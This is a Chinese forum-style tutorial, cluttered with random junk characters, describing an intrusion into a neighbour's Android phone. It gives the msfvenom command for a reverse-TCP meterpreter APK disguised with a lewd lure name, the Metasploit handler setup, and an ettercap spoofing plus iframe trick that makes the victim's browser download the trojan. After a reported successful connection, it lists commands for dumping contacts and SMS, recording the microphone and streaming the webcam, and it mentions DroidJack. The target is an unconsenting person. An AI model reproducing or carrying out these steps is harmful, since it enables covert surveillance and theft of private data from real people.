1 C- D$ i7 C! z/ n" ?8 n0 B
五、msf+ettercap入侵邻居安卓手机
5 h. L3 I3 a) i% r# P/ Q8 p i6 I1 Y- b& ]+ l v% f) g
; k- M* a( i! Q. A8 Q' a: \ 首先启动msf
# K$ N5 E8 Y# o3 n d3 ]
0 F2 A/ d! q# A u2 y# l. q8 x# R+ L" I1 _- N; `
先用kali生成一个安卓木马,如下命令:
3 y# x, ~2 u$ i, H8 I, Q
J2 a F; v/ i2 `7 W* B5 K
" b/ Z* [% y6 _* N Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk : c! c# S3 v; M9 i4 k, X2 f
$ g5 i6 i, [; ~/ g7 S( o% K) U, i8 `) K, `
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
6 c/ Y1 ]8 x% T M% x3 M. F 6 ~, W2 d/ L. V& V+ ^
2 c6 a$ H4 d( ^2 m5 m
然后进入msf
3 n. p8 p1 T3 C# c' \+ o7 B
6 J: t8 O: B/ @# K( T- G+ Y( P
1 @. }& ^1 x4 m use exploit/multi/handler
, h/ M1 y& e0 \2 o5 z' E
0 S7 s5 D! j" H0 C- ?4 d$ h# o7 B1 D' t/ v5 R6 q0 y. X
set payload android/meterpreter/reverse_tcp $ ~ Q8 U( \' y$ u
7 ~, I- y- S$ n% D. T a9 E5 k( C3 Y8 S* e. r; j$ V. i# j
set LHOST 192.168.0.109 //ip为kaili的ip - |6 m1 Q2 Q$ v3 D
, \% x2 E, i8 ~7 w
r2 z! g" W7 D- i- x) o set LPORT 44444 //端口一定要与前面生成的木马的端口一致 1 z6 M2 y Z# l( _
; \9 v9 N: a% E7 k
+ F1 T! X |( @. ?" S Exploit & C4 r- V b/ e: Y
1 t3 }6 u, w9 r3 |* @, q3 _% W. y! m9 I, J+ P6 H
* u* Z' s# c' p V/ [5 a" d7 j3 ?) V 3 s `0 A/ I# P
# H! v2 |' \) [7 g 下面我们开启ettercap -G
; m8 F3 j' Z$ T" J- o! B7 X3 x1 Y 9 k) B" N4 a2 e
3 L/ F a! x% {5 w7 i7 T9 _ \/ S 我物理IP为 3 E' D# {9 l, E/ ~- Q- I3 G
. C& J6 N" r+ L! ~4 W! ~9 H! [ q# X
' w+ o5 t& b$ B4 u" e
- q9 p: ]) D" v2 y2 n3 a2 e
5 v' E. A( D# d! E2 P
; i4 v2 X' D1 ~ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
9 c$ @$ G! a8 a/ Y
3 V; e( A" l4 j7 W, i/ ^6 ?) h
; ~/ d, @0 a D 下面我们来设置一下 ; |7 o6 J/ Q& ]1 y
3 C ^7 r! l+ ~
3 t; P" y' P, D( V3 _! a4 { + V! S# b4 P4 U% G% W
; j4 p1 I" ~' V K
, g, I" S/ d# l0 W) Z/ B; Y
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 1 g" j- X) Y+ h/ e, m% @4 _
! h/ W4 q) N7 a/ ~" ~5 a5 T
; K7 l" d- ^2 Q/ {( M/ q
2 t% t) R V% ~( O
: e& V5 G6 z/ \+ `" ~
9 d4 a K% x" w: B0 T7 W
3 u6 @5 g& o) g6 l) d6 J, d! ^ 5 P! u' @8 C( X) |/ _
( B. [7 l Q: ^. G7 K - @6 m4 t( |) K) ]: G" m
+ H4 L# s2 ]2 \, x+ h6 P/ H
* S# N/ o% u. C8 f9 d , E+ n. U/ d! v4 |' \7 Q/ {
7 h+ O& \0 k# r/ l( `, r& e0 s0 m3 k7 A5 N8 |
5 t2 R4 S" K9 n8 [) s) H! W6 w
7 l& w: ]3 h" q, R0 }6 \
; F5 @- K, E- P" I8 ]5 H
$ t7 b; k% x6 ^" H6 u9 R9 |0 x
! n, a7 I- E. _0 U i' C9 X
P) r1 Q: k" @7 ^, L. N! M+ Z
) v" ^$ l( M# q/ w( c6 }; ?
0 V! w8 v2 c5 ^* {6 T2 h
5 Y( _% G; [" y& g
9 S0 [7 ^5 v" Q& W! h$ }/ F 5 L2 s/ A7 b9 F2 C
/ ~/ K. r E% Y
# M( j8 w2 z0 H , Z* I! I) q. z* a
3 B5 w( p/ P7 F$ P; v; M" r
, C! A* y1 H. _& i8 s6 g( c; s
- ^+ D8 Z- ~9 C& n2 h
- u) x2 f7 H/ M8 y2 z; q / C" b' l" X6 `/ R& O" q
( }( X& E0 ^, N, x% D) \! c7 y( P8 p7 v& i3 \
# X* x9 g2 Y/ Y
" |) Z1 d* z0 K5 K5 h6 {
8 y" y8 ]) H4 c8 `, N
- O6 |) u8 s+ z# J: b" b# C0 u. X/ ~6 m 7 X, } R4 ^. c! H3 P2 X
+ C" w1 q5 A" ? z: D9 d1 p
下面我们开始攻击
0 d# j8 Q: S6 W
+ f' {' }+ H3 m9 h+ x
7 J( x$ I& ?! l2 s6 v- q7 {
5 B' w) A; B/ O1 z - B1 Y0 e/ \" X6 J9 p5 a& `. k
$ v a' A. x# j3 A8 V6 }% W
# `" M( b% e: o# J" Y; H
8 T* L8 D" Z! D c
1 e4 w0 x# [; Q
+ y' e8 l5 q/ _+ p8 O0 f& e
1 Z7 m5 g7 o( B% {' e, p) e3 y; L" `
, s4 Y7 p& D: x& H ) Q6 Z+ {+ T0 b; h, M
6 \, e1 [& @2 L8 i' Z
; F& k0 [) L/ J1 s$ W
8 {% u% F. N& P( y ( k" A2 z0 E8 m' F; ]
! z, y9 `/ f2 R5 T# f" N 大概过了5分钟多,发现反弹成功了 & S" m4 A0 D( Q D3 F+ x% N
5 M! ]3 u) z6 k+ H. `7 y8 U
9 Q' ^: @/ \* `, S& l& M
- D. r; o( T/ _# B. z 2 v _7 i+ m* }9 e% |8 z2 N
' d$ \/ J% j: R6 y X& e: E% @/ A) h4 ?
! O! U! @# G& E8 A, b+ G6 M! X$ D) U
/ t5 u5 H& l: G) }: J, {
9 i8 }' C4 I8 K" L7 [
4 S/ a& P* w) P4 u% D
2 g1 Z6 W: I! d( y7 V2 [
" M3 o+ a0 p8 C! D1 Z3 Q5 X& w% j! R
0 o" M1 N o* \
% _: H3 e; W6 _8 W6 p
$ |2 V( m S8 E6 H
, l4 O6 ^1 n- E% v& N ; }8 @ B6 I+ q
$ N! s( ?/ G) x- o0 R n0 T1 o1 q, w9 N H2 V- n: ~" I
' E" Y7 I2 R2 Q0 E1 ?
' f5 |& b( u; `7 [ X5 A' Q
' |* w: x& c$ j0 I; ^2 v5 O$ Z 执行命令
3 q$ Q9 q8 g; T% U0 Q 5 S9 s- o6 D; F! z% K
* {2 a- M$ e1 o+ A0 v) v8 H. W. L9 B
H/ M7 l5 X) m/ h, C5 {, R
- E# G* K2 Z7 s1 o w3 g
% G) h) m+ k. C dump_contacts --》这个是导出电话 0 G" b$ A p l- q
& |/ A. z9 I4 n' k+ H' t/ I, a; q
0 Z* K* f* _: [% s H$ y0 `" R dump_sms --》这个是导出信息 - s' g* H( K% J) w0 K
+ d' f( L0 I9 m' x0 ?$ X8 Q) `0 H& z) Z" B: e3 p, ^
record_mic Record audio from the default microphone for X seconds
0 Y9 `! `) H" H+ _5 o & W+ w. v, E0 b
' B% W+ ^! I, x webcam_chat Start a video chat , S# y$ F& K& U
- o$ X( E3 E& L8 h* i' B
6 Z1 G: `9 h$ K! ^1 }) o3 K2 F webcam_list List webcams + F- x( C9 ^7 ^
4 v0 Q- S( |3 J* \/ u8 i
& R' W2 K8 k3 ^! o- o webcam_snap Take a snapshot from the specified webcam
5 b! u# ^/ y2 v& T+ i, g6 B! C 0 c7 { v* K W
) e1 w" g% b- W2 Q' Y% @4 [
webcam_stream   lay a video stream from the specified webcam 5 @4 l1 U5 z2 x+ K: I" a5 j9 w
C; K) u' N% N) r0 f" e0 H: S5 ]/ K5 D/ x! f
% e; l G* G( F0 @& O
" X' `2 f$ z# K |4 _+ [) k% j9 u1 a
( V% D$ X8 C+ n! Q
% P' \, s' B& i3 E" @( y( b" ?, A* G0 f* ?9 i8 A: a
我们打开看一下电话薄,
, W4 U6 U. b$ C! [! c, D4 n
7 r: d3 ^+ p: G5 O, y4 s/ w- }" Q ?+ u2 H5 |% X7 W2 ~
: n+ [5 b2 j. _7 Q
$ y: l/ w/ I9 W+ H) N; L4 d
: ?2 f% b& g' T! c, C$ h 5 D. Y9 v5 A- w1 V
: _* J" S: f3 |9 C
' Q& G% I, m P! R& b; F
) P/ L3 C$ W7 y! _ * K r1 M+ ], ?! w# B! R) ^
9 T S' \% r- W4 r
, I+ \) p2 u3 G6 x2 X3 A) D+ Q $ e8 ~- P0 }6 q7 V" c, A& x
; g/ t, N( A& |( e( @. M! k
5 j O% t2 v! J- F ; m( G v- M, a6 i
% y( } O' m4 {* O( E1 m
1 L; w, p3 |: x
0 n! f! ]2 t7 w5 w7 \/ M! I
4 w4 E7 t7 N% |3 s: ~
我们同时欺骗成DroidJack木马,使用方法如图:
$ d! a2 I# q- ?% w- i0 f
8 l4 Y- U6 k3 p0 h# N [2 O7 f. F5 i# c
4 R: }2 w- u! k& Y" \5 b7 Y
+ u0 v: ^: Z; V( q# d# ?# j
! i9 i7 v+ J3 ^9 _7 A
% n' X F0 E0 z% D8 ^: E 4 J" V( V% e5 @+ e
& z6 }5 Z( z% r, y1 [* @7 W % j3 E# }( n4 ` j% T
: f( |# p8 G4 }( L5 B; |
! }$ p) u) x/ V2 p% U7 i 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
7 F# Y9 c; r3 e5 G" n0 n6 K" l# Z ! m! K4 _3 \9 E; Q
" Z" @7 @2 S4 F& Q6 b' `/ {: ~1 } 6 V8 O% Z( U4 ~, o
( a7 w; }' d4 c, p* K$ o- `
: p. Y! I9 H# ]) b
1 Y |* d1 M; x7 a# Q
W% u) c4 l* n/ h
I- e, W/ M$ J8 m1 K 9 z! @. F) j! o3 b7 Q. p+ c
1 S" ], @$ ]1 V
7 p. n" o. X6 D1 J: I 
% R9 w3 Y4 U" E( f U, V1 G 1 E. K+ a$ v1 a- g: @, n
2 {; r' ?- n( n z8 @. a: m! Z
" S G! z @. y* s4 c
|